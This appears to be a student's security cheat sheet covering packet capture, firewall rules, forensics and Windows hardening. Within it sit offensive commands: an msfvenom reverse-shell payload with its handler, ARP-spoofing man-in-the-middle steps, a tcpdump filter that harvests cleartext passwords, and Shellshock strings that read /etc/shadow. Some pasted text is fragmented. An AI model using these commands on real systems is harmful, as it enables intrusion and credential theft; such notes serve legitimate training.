Should have an 'alert' file, and a snort.log.{randomNum} pcap file in the chosen dump directory a. alert udp any any -> 192.168.10.2 7983 (msg:"Consecutive Pi"; pcre:"/pi/is"; threshold:type limit,
track by_src, count 2 , seconds 60; sid:333; rev:1;)
TcpReplay/tcprerwite/tcpprep Step 1 ¶ Use tcpprep to split traffic based on the source/destination port:
$ tcpprep --port --cachefile=example.cache --pcap=example.pcap In this case, all the packets directed to a TCP or UDP port < 1024 are considered client->server, while other packets are server->client. This information is
stored in a tcpprep cache file calledexample.cache for later use. Note: tcpprep supports many other methods of splitting traffic then just port mode. Step 2
Use tcprewrite to change the IP addresses to the local network:
$ tcprewrite --endpoints=172.16.0.1:172.16.5.35 --cachefile=example.cache --infile=example.pcap --outfile=new.pcap Here, we want all traffic to appear to be between two hosts: 172.16.0.1 and 172.16.5.35. We want one IP to be the "client" and the other IP the "server", so we use the cache file created in the last step.
Step 3
Use tcpreplay to send the traffic through the IPS: # tcpreplay --intf1=eth0 --intf2=eth1 --cachefile=example.cache new.pcap
Mounting with DD 0.1 Make working and original copies first
1. To create an image #dd if=/dev/sda of=/mnt/nfs/backup/harddrive.img
2. To check the file system #file harddrive.dd
3. To mount# mount -o ro ./harddriveimage.dd /mnt
4. To unmount #umount /mnt
5. To restore #dd if=/mnt/mybackup.ddimg of=/dev/sda
Changing names on multiple files 1. counter=0
2. for i in ./webstats.php*; do mv $i ./webstats$counter.html; counter=$((counter+1)); done
3. python3 -m http.server 80
SCP scp /path/to/file [email protected]:/path/to/dest
scp [email protected]:/path/to/file /path/to/dest
SSH PIVOTING ssh -L 127.0.0.1:445:10.10.9.159:445 [email protected] ----local ip/port------target ip / port ---- --pivot user and destination IP---- ssh socks proxy/proxychains:
SOCKS Proxy
Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
Command line:
first configure proxychains at /etc/proxychains.conf. By default it's port 9050
#ssh -D 127.0.0.1:9050 [email protected]
target ip
#proxychains nmap -n 9050 10.0.0.1
FIREFOX CONFIG FOR SSH/SOCKS PROXY:
GPG4Win 1. Encrypt a file for recipient using their public key:
D:\gpg --encrypt -r Bob myFile.txt
--armor (ASCII Armor Switch)
--output (can set output filename)
--symmetric (set a passphrase to encrypt and decrypt
2. Decryption:
gpg –decrypt my-file.gpg
can use a - -output
3.Signing:
gpg --armor --sign my-file.txt
YOU CAN COMBINE THESE
4. Key Creation:
gpg --gen-key
--edit-key bob (This will edit the current key)
5. Importing Keys:
gpg --import d:\temp\pubKeybob.asc
gpg --import d:\temp\my-sec.gpg
6. Listing Keys:
gpg -kv (public keys)
gpg --list-keys
7. Export public key:
gpg --armor --output pub.asc --export Chris
--export-secret-keys
8. Sign keys so they are accepted
gpg --sign-key [email protected]
9. Sending back signed key
gpg --export --armor [email protected]
10. Encrypt Message for sending
gpg --encrypt --sign --armor -r [email protected] name_of_file
Volatility: volatility -f flag4.raw psxview volatility -f flag4.raw --pid=1288 cmdline volatility -f flag4.raw memdump -p 1288 -D dir/ Open in Notepad++/FRHED to see what the process did
OpenVas root@kali:~# apt-get update root@kali:~# apt-get dist-upgrade root@kali:~# apt-get install openvas root@kali:~# openvas-setup root@kali:~# netstat -antp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/openvasmd tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/openvassd: Wai tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9596/gsad root@kali:~# openvas-start https://127.0.0.1:9392
openvas-check-setup
openvas-stop
openvasmd --create-user=admin --role=Admin
openvasmd --user=admin --new-password=admin
openvas-start
NMAP 1. The following will scan just for port 22 and then make a list:
nmap -n -p 22 -Pn --open 192.168.119.133 | grep report | cut -d " " -f5 > /tmp/ipaddr.list
2.
IPTABLES Display Status:
#iptables -L -n -v
With Line numbers:
#iptables -n -L -v –line-numbers
Input or output display by lines
#iptables -L INPUT -n -v
#iptables -L OUTPUT -n -v –line-numbers
Start/Stop/Restart
#service iptables start
#service iptables stop
#service iptables restart
Flush/ Delete all rules:
#iptables -F
Deleted a specific rule from the line
#iptables -D INPUT 4
Insert a specific rule
#iptables -I INPUT 2 -s 202.54.1.2 -j DROP (Drops any packets coming in from 202.54.1.2)
To save firewall rules under CentOS / RHEL / Fedora Linux, enter:
#service iptables save
To restore firewall rules form a file called /root/my.active.firewall.rules, enter:
# iptables-restore < /root/my.active.firewall.rules
To restore firewall rules under CentOS / RHEL / Fedora Linux, enter:
#service iptables restart
To set defaults:
# iptables -P INPUT DROP
# iptables -P OUTPUT DROP
# iptables -P FORWARD DROP
Base default installs: # iptables -N LOGGING #Creates a new chain#logs to /var/log/messages
/var/log/kern.log.
# iptables -P INPUT DROP
# iptables -P FORWARD DROP
# iptables -P OUTPUT ACCEPT
# iptables -A INPUT -m state --state NEW,ESTABLISHED -j ACCEPT
# iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -j LOG
–log-level 4
# iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -j DROP
# iptables -A INPUT -i lo -j ACCEPT
# iptables -A OUTPUT -i lo -j ACCEPT
THIS NEXT PORTION LOGS ALL DROPPED PACKETS THAT MAKE IT TO THE END THAT COME
# iptables -N LOGGING
# iptables -A INPUT -j LOGGING
# iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
# iptables -A LOGGING -j DROP
MORE MISC RULES
iptables -A OUTPUT -j ACCEPT
This tells Iptables to add a rule accepting OUTPUT.
You should now have:
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -p udp --sport 53 -j ACCEPT
iptables -A INPUT -j DROP
iptables -A OUTPUT -j ACCEPT
iptables-save > /etc/iptables.rules
NGREP #for I in *; do ngrep -W byline -O /tmp/pcapname$i.pcap -qI $i host 1.2.3.4; done
#cd tmp
#mergecap -w newpcapname.pcap srcPcap*
TCPDUMP
TCPDUMP
ip[0] & 0x0f = 5 (This would find all packets without ip options)
ip[0] & 0x0f > 5 (This would find all packets with ip options since it is typically no longer than 20)
BITMASKING
CWR | ECE | URG | ACK | PSH | RST | SYN | FIN
0 0 0 0 0 0 1 0 = 0x02 SYN
0 0 0 1 0 0 1 0 = 0x12 SYN/ACK
0 0 0 1 1 0 0 0 = 0x18 PUSH/ACK
0 0 0 1 0 0 0 1 = 0x11 FIN/ACK
Corresponding values:
8 4 2 1 | 8 4 2 1
Therefore:
tcp[13] = 0x02 (gives only syn packets) exclusive
tcp[13] & 0x02 = 0x02 (we dont care what the other fields look like as long as SYN is set.) inclusive
using this same logic, we could be inclusive specifically:
tcp[13] & 0x0f = 0x02 (this says that we want to at least to have the SYN flag, we DONT want the
PSH, RST, and FIN flags BUT…. we do not care what the CWR,ECE,URG,ACK flags are
Other examples:
tcp[12] & 0x0f > 0x50 (In this one we are bitmasking the left order nibble for the tcp header length.
WE dont care whats in the right order nibble of the byte. We just want anything that is greater than 5x4
= 20 bytes in length for the tcp header)
tcp[13] & 0x14 != 0 (This says any flags but at least the ack or the rst flag has to be on)
The mask basically says, I only care about the bits specified in the mask.
1. Capture using time and date settings:
tcpdump -i eth1 -s0 -v -w /tmp/capture_`date +%d_%m_%Y__%H_%I_%S`.pcap
2. tcpdump top 10 talkers. capture 2000 packets and print the top 10 talkers
tcpdump -tnn -c 2000 -i eth0 | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | awk '
$1 > 10 '
3. tcmdump check ping. capture only ping echo requests with tcpdump
tcpdump -nni eth0 -e icmp[icmptype] == 8
4. sniff network traffic on a given interface and displays the IP addresses of the machines communicating with the
current host (one IP per line):
sudo tcpdump -i wlan0 -n ip | awk '{ print gensub(/(.*)\..*/,"\\1","g",$3), $4, gensub(/(.*)\..*/,"\\1","g",$5) }' |
awk -F " > " '{print $1"\n"$2}'
5. tcpdump sniff pop3,imap,smtp and http then grep it:
tcpdump -i eth0 port http or port smtp or port imap or port pop3 -l -A | egrep -i
'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|userna
me:|password:|login:|pass |user '
6. All traffic except from certain host:
sudo tcpdump -n -i eth0 -w data.pcap -v tcp or udp and 'not host 192.168.1.2'
SMTP
SMTP Commands
The following table lists the SMTP commands that are provided by the Microsoft Windows® SMTP service (SMTPSVC).
SMTP commands
SMTP
command Command function
HELO Sent by a client to identify itself, usually with a domain name.
EHLO Enables the server to identify its support for Extended Simple Mail Transfer Protocol
(ESMTP) commands.
FROM Identifies the sender of the message; used in the form MAIL FROM:.
RCPT TO Identifies the message recipients; used in the form RCPT TO:.
TURN Allows the client and server to switch roles and send mail in the reverse direction
without having to establish a new connection.
ATRN
The ATRN (Authenticated TURN) command optionally takes one or more domains
as a parameter. The ATRN command must be rejected if the session has not been
authenticated.
SIZE
Provides a mechanism by which the SMTP server can indicate the maximum size
message supported. Compliant servers must provide size extensions to indicate the
maximum size message that can be accepted. Clients should not send messages that
are larger than the size indicated by the server.
ETRN An extension of SMTP. ETRN is sent by an SMTP server to request that another
server send any e-mail messages that it has.
PIPELININ Provides the ability to send a stream of commands without waiting for a response
G after each command.
CHUNKIN
G
An ESMTP command that replaces the DATA command. So that the SMTP host does
not have to continuously scan for the end of the data, this command sends a BDAT
command with an argument that contains the total number of bytes in a message. The
receiving server counts the bytes in the message and, when the message size equals
the value sent by the BDAT command, the server assumes it has received all of the
message data.
DATA Sent by a client to initiate the transfer of message content.
DSN An ESMTP command that enables delivery status notifications.
RSET Nullifies the entire message transaction and resets the buffer.
VRFY
Verifies that a mailbox is available for message delivery; for example, vrfy
ted verifies that a mailbox for Ted resides on the local server. This command is off
by default in Exchange implementations.
HELP Returns a list of commands that are supported by the SMTP service.
QUIT Terminates the session.
The following table lists the extended SMTP commands that Exchange makes available to the SMTP service.
Extended SMTP commands
Extended SMTP
command Command function
X-EXPS GSSAPI A method that is used by Microsoft Exchange Server 2003 and
Exchange 2000 Server servers to authenticate.
X-EXPS=LOGIN A method that is used by Exchange 2000 and Exchange 2003 servers to
authenticate.
X-EXCH50 Provides the ability to propagate message properties during server-to-
server communication.
X-LINK2STATE Adds support for link state routing in Exchange.
Metasploit Payloads: General process to create exe root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101
LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > show options
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 3333
LPORT => 31337
msf exploit(handler) > exploit
Php payload:
set PAYLOAD php/meterpreter/bind_tcp
Linux Payload
use payload/linux/x86/shell_reverse_tcp
EtterCap/Arpspoof 0.5. First enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
1. A whole subnet:
ettercap -T -M arp:remote //192.168.119.0/24
2. Same thing using arpspoof
arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null
killall arpspoof
3. Then use wireshark or tcpdump to capture traffic between the two
4. Sniffing traffic with p0f:
p0f -i eth0 -o /tmp/p0f.pcap
tshark Capture interface:
-i <interface> name or idx of interface (def: first non-loopback)
-f <capture filter> packet filter in libpcap filter syntax
-s <snaplen> packet snapshot length (def: 65535)
-D print list of interfaces and exit
-d decode as. Ex- tshark -d tcp.port==8888,http
-c <packet count> stop after n packets (def: infinite)
-r read from a file
-Y <display filter> packet displaY filter in Wireshark display filter syntax
-n disable all name resolutions (def: all enabled)
-w <outfile|-> write packets to a pcap-format file named "outfile"
-T pdml|ps|psml|text|fields
format of text output (def: text)
-e <field> field to print if -Tfields selected (e.g. tcp.port, col.Info);
this option can be repeated to print multiple fields
-t a|ad|d|dd|e|r|u|ud output format of time stamps (def: r: rel. to first)
-u s|hms output format of seconds (def: s: seconds)
Samples:
tshark -r newcarve.pcap -Y "udp.srcport == 53" -n -T fields -e dns.qry.name -e dns.resp.addr
(reads a file and filters out DNS traffic and displays the dns qry and response fields)
tshark -n -r snort.log.1425686433 -Y http -T fields -e http.user_agent
(reads a file and filters out http and then displays only certain fields) tshark -nr 2015-03-04.pcap -q -z follow,tcp,ascii,xxxxx (exports just the payloads)
tshark -r test.pcap -Y 'http.request.method == POST and tcp contains "password"' | grep password
#!/usr/bin/env python3
import subprocess
srcfile = ''
wsfilter = ''
tsharkcmd = "tshark -r " + srcfile + ' -Y "' + wsfilter + '" -T fields -e tcp.stream | sort -un > /tmp/tcpstream.txt'
tmpdst = open('/tmp/tcpstream.txt','r')
for i in tmpdst.readlines():
subprocess.call("tshark -nr " + srcfile + " -q -z follow,tcp,ascii," + i, shell=True)
tmpdst.close()
To dump ICMP payloads: tshark -r infile -Y icmp -T fields -e data | tr -d '\n' > hex.txt
#Then python it:
import codecs
file1 = open('hex.txt','r').read()
file1 = bytes.fromhex(file1).decode('ISO-8859-1') #or utf-8
print(file1)
Finding Recently Modified Files Recursively Find last modified files starting from most recently changed:
$ find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
To search for files in /target_directory and all its sub-directories, that have been modified in the last 60 minutes:
$ find /target_directory -type f -mmin -60
To search for files in /target_directory and all its sub-directories, that have been modified in the last 2 days:
$ find /target_directory -type f -mtime -2
To search for files in /target_directory and all its sub-directories no more than 3 levels deep, that have been
modified in the last 2 days:
$ find /target_directory -type f -mtime -2 -depth -3
You can also specify the range of update time. To search for files in /target_directory and all its sub-directories, that
have been modified in the last 7 days, but not in the last 3 days:
$ find /target_directory -type f -mtime -7 ! -mtime -3
To search for files in /target_directory (and all its sub-directories) that have been modified in the last 60 minutes,
and print out their file attributes:
$ find /target_directory -type f -mmin -60 -exec ls -al {} \;
Python3 Decoding Script #!/usr/bin/env python3
import base64
import codecs
x = input('Enter in the b64 string you wish to decode: ')
b64string = x.encode()
b64string = base64.b64decode(b64string)
print(str(b64string)[2:-1])
#uncomment this part and comment the other if you want to open and decode a file
#b64file = open('./filelocation.txt','r')
#filetext = base64.b64decode(b64file)
#print(str(filetext)[2:-1])
/etc/shadow hash types $1$
md5
$2a$
Blowfish
$2y$
Blowfish, with correct handling of 8 bit characters
$5$
sha-256
$6$
sha-512
Finding ADS dir /R
SHELL SHOCK
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
env x='() { :;}; cat /etc/shadow' bash -c 'echo hello'
Windows Hardening -raise UAC -services.msc
-msconfig/startup folder
-windows update
-IE Smart Screen Filter and other settings
-user account permissions - compmgmt.msc
-shares/file permissions
-update misc apps
-remove unecessary programs
-local security policy (secpol.msc, gpedit.msc)
-action center
-disable ipv6
-firewall used advanced sec options. Block inbound and outbound connections
-gpedit.msc/secpol.msc
GPEDIT/SECPOL.msc configs
Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\
Minimum password length = 15
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\
Interactive logon: Do not display last user name = enabled
User Account Control: Virtualize file and registry write failures to per-user locations = enabled
User Account Control: Only elevate UIAccess applications that are installed in secure locations = enabled
User Account Control: Behavior of the elevation prompt for standard users = prompt for credentials on the
secure desktop
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode = prompt
for consent on the secure desktop
MSS: (SafeDllSearchMode) Enable Safe DLL search mode (recommended) = enabled
Shutdown: Allow system to be shut down without having to log on = enabled
Interactive logon: Do not require CTRL+ALT+DEL = disabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\
Bypass traverse checking = Users,Network Service,Local Service,Administrators
Allow log on locally = Administrators, Users
Computer Configuration\Administrative Templates\Windows Components\Credential User Interface\
Require trusted path for credential entry = enabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Interactive logon:
Do not require CTRL+ALT+DEL
Interactive logon: Do not require CTRL+ALT+DEL = Disabled
Computer Configuration\Administrative Templates\Windows Components\AutoPlay Policies\
Turn off Autoplay = enabled
Turn off Autoplay = All drives
Default behavior for AutoRun = Do not execute any autorun commands
Turn off Autoplay for non-volume devices = enabled
Computer Configuration\Administrative Templates\Windows Components\NetMeeting\
Disable remote Desktop Sharing = enabled
Computer Configuration\Administrative Templates\System\Internet Communication
Management\Internet Communication settings\
Turn off the Windows Messenger Customer Experience Improvement Program = enabled
Turn off Help and Support Center "Did you know?" content = enabled
Turn off Windows Customer Experience Improvement Program = enabled
Computer Configuration\Administrative Templates\Network\Microsoft Peer-to-Peer Networking
Services\
Turn off Microsoft Peer-to-Peer Networking Services = enabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security
Options\Interactive logon: Smart card removal behavior
Interactive logon: Smart card removal behavior = Lock Workstation
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Accounts:
Guest account status
Accounts: Guest account status = Disabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Accounts:
Rename administrator account
Accounts: Rename administrator account = Not Defined
Accounts: Rename guest account = Not Defined
Computer Configuration\Administrative Templates\Windows Components\Windows Mail\
Turn off the communities features = enabled
Turn off Windows Mail application = enabled
Computer Configuration\Administrative Templates\System\Remote Assistance\
Solicited Remote Assistance = disabled
Computer Configuration\Administrative Templates\Windows Components\HomeGroup\
Prevent the computer from joining a homegroup = enabled
Computer Configuration\Windows Settings\Security Settings\Windows Firewall with Advanced
Security\Windows Firewall with Advanced Security\Windows Firewall Properties\Public Profile\
Windows Firewall: Public: Allow unicast response = No
User Configuration\Administrative Templates\Control Panel\Personalization\
Password protect the screen saver = enabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\MSS:
(ScreenSaverGracePeriod) The time in seconds before the screen saver grace period expires (0
recommended)
MSS: (ScreenSaverGracePeriod) The time in seconds before the screen saver grace period expires (0
recommended) = 0
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security
Options\Interactive logon: Display user information when the session is locked
Interactive logon: Display user information when the session is locked = Enable
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\System
cryptography: Force strong key protection for user keys stored on the compute
System cryptography: Force strong key protection for user keys stored on the computer = Enable
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\User
Account Control: Behavior of the elevation prompt for standard users
User Account Control: Behavior of the elevation prompt for standard users = Automatically deny elevation
requests
Computer Configuration\Administrative Templates\Windows Components\Windows Installer\Always
install with elevated privileges
Always install with elevated privileges = Disabled
Computer Configuration\Administrative Templates\System\Internet Communication
Management\Internet Communication settings\Turn off downloading of print drivers over HTTP
Turn off downloading of print drivers over HTTP = Enabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network
access: Do not allow anonymous enumeration of SAM accounts and shares
Network access: Do not allow anonymous enumeration of SAM accounts and shares = Enabled
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Shutdown:
Clear virtual memory pagefile
Shutdown: Clear virtual memory pagefile = Enable
Protocol 2
Protocol
